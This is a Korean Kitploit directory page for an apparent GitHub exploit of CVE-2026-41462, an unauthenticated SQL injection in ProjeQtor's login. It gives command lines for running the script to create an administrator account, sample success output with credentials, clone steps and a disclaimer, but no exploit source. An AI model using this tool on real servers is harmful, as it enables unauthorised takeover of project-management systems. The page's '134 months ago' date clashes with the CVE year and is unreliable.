Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
도구/GitHubGitHub/0xblackash/cve-2026-41462
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

저장소 보기
134개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2026-41462 - ProjeQtor 인증되지 않은 SQL 인젝션

projeqtor_cover

ProjeQtor ≤ 12.4.3의 치명적인 인증되지 않은 SQL 인젝션

Critical CVSS 9.8 Unauthenticated

📌 개요

CVE-2026-41462는 ProjeQtor 프로젝트 관리 도구의 로그인 기능에서 발견된 치명적인 인증되지 않은 SQL 인젝션 취약점입니다.

  • CVE ID: CVE-2026-41462
  • 영향을 받는 버전: ProjeQtor 7.0 ~ 12.4.3
  • 패치된 버전: 12.4.4
  • 심각도: 치명적 (CVSS 9.8)
  • 유형: 인증되지 않은 스택 기반 SQL 인젝션

🛠️ 익스플로잇

사용법

root@kitploit:~
python3 CVE-2026-41462.py -u http://target.com --create-admin

# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!

📊 성공 시 표시되는 결과

익스플로잇이 성공하면 다음과 유사한 출력이 표시됩니다:

root@kitploit:~
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php

익스플로잇 실행 후:

  1. 브라우저를 열고 다음으로 이동합니다:
    http://target.com/login.php

  2. 스크립트 출력에 표시된 자격 증명으로 로그인합니다.

  3. 성공하면 전체 관리 권한으로 ProjeQtor 관리자 대시보드에 접속하게 됩니다.

성공 지표:

  • 모든 프로젝트, 사용자 및 시스템 설정을 볼 수 있습니다
  • 제한 없이 프로젝트를 생성/수정/삭제할 수 있습니다
  • 사용자 관리 섹션에 새 사용자가 표시됩니다

📁 저장소 구성

파일설명
CVE-2026-41462.py기본 익스플로잇 스크립트
CVE-2026-41462.yamlNuclei 탐지 템플릿
README.md이 문서

🚀 빠른 시작

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. 익스플로잇을 실행합니다:

    root@kitploit:~
    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. 새로 생성된 관리자 계정으로 로그인합니다.


⚠️ 면책 조항

이 도구는 교육 목적 및 승인된 침투 테스트용으로만 제작되었습니다. 승인되지 않은 사용은 불법입니다.


📄 참고 자료

  • NVD - CVE-2026-41462
  • 공식 ProjeQtor 패치 (v12.4.4+)

책임 있는 공개 • 윤리적 해킹 전용
안전하게 유지하세요. 합법적으로 테스트하세요.
도구 다운로드